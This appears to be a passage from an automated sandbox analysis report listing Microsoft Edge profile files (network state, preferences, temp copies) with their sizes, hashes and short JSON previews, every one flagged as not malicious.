                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2ee8c.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2f9a8.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2f9f6.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF315ea.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\aa649f5a-a1fe-4187-a345-e3e66a987b50.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dbe91f8c-2ba5-4895-8420-7812b0bce716.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\decc0440-28e1-4f3d-bd24-5bdcfbd968eb.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\eef1f5a2-141e-4972-af6d-8fc837e05900.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.305225449403416
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YXssZVMdBsE8FZFRudFGcsRZ6ma3yeevbC7n7:YXsU8sHTfcdsXleevbM
                                                                                                                                                                                                                                                                                                        MD5:58FC2E60D1ADF51FEAF90DEBE5009DC0
                                                                                                                                                                                                                                                                                                        SHA1:E1F49E05BC62E6ED53D24F76A406DC9E65871BDF
                                                                                                                                                                                                                                                                                                        SHA-256:B2B52B0A2A086358020394BD97B5C2797F29B1919E0B3E151977B8D9B67DB906
                                                                                                                                                                                                                                                                                                        SHA-512:BD25DD4BA357C345D0147B1479E2EA35B8D0167AB575686165D03FCDB436577EADCBC5614AC0D23589D10C4497C7B95E801366D1AD55FAEF52C7293DF1F682BB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381595737587309","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381595740359644","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379097380074983","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com"}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f689416d-ee17-4ea5-9e68-267a057f644a.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10021
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111847723498965
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/sDQcsmDwmw5Bkz3o88bV+FCHQArGBCdcKJ:stqvsDQcsoe/bGOQCEC
                                                                                                                                                                                                                                                                                                        MD5:706B8D72C95C837D64A3941B31D897A0
                                                                                                                                                                                                                                                                                                        SHA1:B75F19CBE1274A1563FF36F09F5135A3BE6479D0
                                                                                                                                                                                                                                                                                                        SHA-256:ECC6E25DA9F4C396F7A617F0D1915C15AF2BB8F4F908A2BC23599C04973B0CFD
                                                                                                                                                                                                                                                                                                        SHA-512:90B24A3160D5A6273334DEB79717A80FFD7AB9DC48C1FCFAE836209A0D6C2628101A9DEED0BA725A88CF1F7686FDFEE9B9221F21447C5FDB5124040541E924B8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF31a01.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10021
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111847723498965
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/sDQcsmDwmw5Bkz3o88bV+FCHQArGBCdcKJ:stqvsDQcsoe/bGOQCEC
                                                                                                                                                                                                                                                                                                        MD5:706B8D72C95C837D64A3941B31D897A0
                                                                                                                                                                                                                                                                                                        SHA1:B75F19CBE1274A1563FF36F09F5135A3BE6479D0
                                                                                                                                                                                                                                                                                                        SHA-256:ECC6E25DA9F4C396F7A617F0D1915C15AF2BB8F4F908A2BC23599C04973B0CFD
                                                                                                                                                                                                                                                                                                        SHA-512:90B24A3160D5A6273334DEB79717A80FFD7AB9DC48C1FCFAE836209A0D6C2628101A9DEED0BA725A88CF1F7686FDFEE9B9221F21447C5FDB5124040541E924B8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF38f41.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10021
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111847723498965
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/sDQcsmDwmw5Bkz3o88bV+FCHQArGBCdcKJ:stqvsDQcsoe/bGOQCEC
                                                                                                                                                                                                                                                                                                        MD5:706B8D72C95C837D64A3941B31D897A0
                                                                                                                                                                                                                                                                                                        SHA1:B75F19CBE1274A1563FF36F09F5135A3BE6479D0
                                                                                                                                                                                                                                                                                                        SHA-256:ECC6E25DA9F4C396F7A617F0D1915C15AF2BB8F4F908A2BC23599C04973B0CFD
                                                                                                                                                                                                                                                                                                        SHA-512:90B24A3160D5A6273334DEB79717A80FFD7AB9DC48C1FCFAE836209A0D6C2628101A9DEED0BA725A88CF1F7686FDFEE9B9221F21447C5FDB5124040541E924B8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3dbcb.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10021
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111847723498965
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/sDQcsmDwmw5Bkz3o88bV+FCHQArGBCdcKJ:stqvsDQcsoe/bGOQCEC
                                                                                                                                                                                                                                                                                                        MD5:706B8D72C95C837D64A3941B31D897A0
                                                                                                                                                                                                                                                                                                        SHA1:B75F19CBE1274A1563FF36F09F5135A3BE6479D0
                                                                                                                                                                                                                                                                                                        SHA-256:ECC6E25DA9F4C396F7A617F0D1915C15AF2BB8F4F908A2BC23599C04973B0CFD
                                                                                                                                                                                                                                                                                                        SHA-512:90B24A3160D5A6273334DEB79717A80FFD7AB9DC48C1FCFAE836209A0D6C2628101A9DEED0BA725A88CF1F7686FDFEE9B9221F21447C5FDB5124040541E924B8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF40471.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10021
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111847723498965
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/sDQcsmDwmw5Bkz3o88bV+FCHQArGBCdcKJ:stqvsDQcsoe/bGOQCEC
                                                                                                                                                                                                                                                                                                        MD5:706B8D72C95C837D64A3941B31D897A0
                                                                                                                                                                                                                                                                                                        SHA1:B75F19CBE1274A1563FF36F09F5135A3BE6479D0
                                                                                                                                                                                                                                                                                                        SHA-256:ECC6E25DA9F4C396F7A617F0D1915C15AF2BB8F4F908A2BC23599C04973B0CFD
                                                                                                                                                                                                                                                                                                        SHA-512:90B24A3160D5A6273334DEB79717A80FFD7AB9DC48C1FCFAE836209A0D6C2628101A9DEED0BA725A88CF1F7686FDFEE9B9221F21447C5FDB5124040541E924B8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):24723
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56861186921997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220BhCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVA5bcOrwnupItu9R:220BhCWPfCfxDu1jaVFcLnZtc
                                                                                                                                                                                                                                                                                                        MD5:90F193A17F0C6D72CA8803CD03779C8A
                                                                                                                                                                                                                                                                                                        SHA1:98EAC7B99EEBA7CCE56B32AA8724AEE9AF35ED67
                                                                                                                                                                                                                                                                                                        SHA-256:3CD64657BC0012905D1164142F4B46FB98F4EF22D8F59E2278CF53D67CBDA0BB
                                                                                                                                                                                                                                                                                                        SHA-512:98406CD0C774802E1B3D162A0A48E3CA024ABF766F4EC7F68163B6FCF108BE5D20F51FA6495A7E4E885ED9B315F448FDCDF65BAD0EC2BB6A4522ED8B75A04FBB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379003729291748","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379003729291748","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF33857.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):24723
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56861186921997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220BhCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVA5bcOrwnupItu9R:220BhCWPfCfxDu1jaVFcLnZtc
                                                                                                                                                                                                                                                                                                        MD5:90F193A17F0C6D72CA8803CD03779C8A
                                                                                                                                                                                                                                                                                                        SHA1:98EAC7B99EEBA7CCE56B32AA8724AEE9AF35ED67
                                                                                                                                                                                                                                                                                                        SHA-256:3CD64657BC0012905D1164142F4B46FB98F4EF22D8F59E2278CF53D67CBDA0BB
                                                                                                                                                                                                                                                                                                        SHA-512:98406CD0C774802E1B3D162A0A48E3CA024ABF766F4EC7F68163B6FCF108BE5D20F51FA6495A7E4E885ED9B315F448FDCDF65BAD0EC2BB6A4522ED8B75A04FBB
                                                                                                                                                                                                                                                                                                        Malicious:false
